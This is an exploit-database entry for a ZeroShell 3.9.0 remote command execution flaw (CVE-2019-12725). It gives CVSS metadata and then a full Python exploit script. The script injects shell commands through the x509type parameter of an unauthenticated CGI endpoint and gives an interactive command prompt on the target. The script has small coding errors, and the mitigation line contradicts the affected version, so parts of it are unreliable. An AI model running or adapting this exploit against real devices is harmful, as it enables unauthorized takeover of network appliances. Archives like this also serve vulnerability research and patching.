ZeroShell 3.9.0 - Remote Command Execution

vendor:

ZeroShell

by:

Fellipe Oliveira

9.8

CVSS

CRITICAL

Remote Command Execution

CWE

Product Name: ZeroShell

Affected Version From: < 3.9.0

Affected Version To: 3.9.0

Patch Exists: YES

Related CWE: CVE-2019-12725

CPE: a:zeroshell:zeroshell

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: ZeroShell 3.9.0

2021

ZeroShell 3.9.0 – Remote Command Execution

ZeroShell 3.9.0 is vulnerable to Remote Command Execution. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This will allow the attacker to execute arbitrary commands on the server.

Mitigation:

Upgrade to ZeroShell 3.9.0 or later version

Source

Exploit-DB raw data:

# Exploit Title: ZeroShell 3.9.0 - Remote Command Execution 
# Date: 10/05/2021
# Exploit Author: Fellipe Oliveira
# Vendor Homepage: https://zeroshell.org/
# Software Link: https://zeroshell.org/download/
# Version: < 3.9.0 
# Tested on: ZeroShell 3.9.0
# CVE : CVE-2019-12725

#!/usr/bin/python3

import requests
import optparse
import time

parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help='Base target uri (ex. http://target-uri/)')

options, args = parser.parse_args()
if not options.url:
    print('[+] Specify an url target')
    print('[+] Example usage: exploit.py -u http://target-uri/')
    print('[+] Example help usage: exploit.py -h')
    exit()

uri_zeroshell = options.url
session = requests.Session()

def command():
    try:
        check = session.get(uri_zeroshell + "/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0Aid%0A'")
        if check.status_code == 200:
            flag = True
            print('[+] ZeroShell 3.9.0 Remote Command Execution')
            time.sleep(1)
            print('[+] Success connect to target')
            time.sleep(1)
            print('[+] Trying to execute command in ZeroShell OS...\n')
            time.sleep(1)
            check.raise_for_status()  

        while flag:
            cmd = raw_input("$ ")
            payload = "/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0A" + cmd + "%0A'"
            uri_vuln = uri_zeroshell + payload
            burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
            res = session.get(uri_vuln, headers=burp0_headers, verify=False)
            print(res.text[:res.text.rindex("<html>") / 2])

    except requests.exceptions.ConnectionError as err:
        print('[x] Failed to Connect in: '+uri_zeroshell+' ')
        print('[x] This host seems to be Down')
        exit()
    except requests.exceptions.HTTPError as conn:
        print('[x] Failed to execute command in: '+uri_zeroshell+' ')
        print('[x] This host does not appear to be a ZeroShell')
        exit()

command()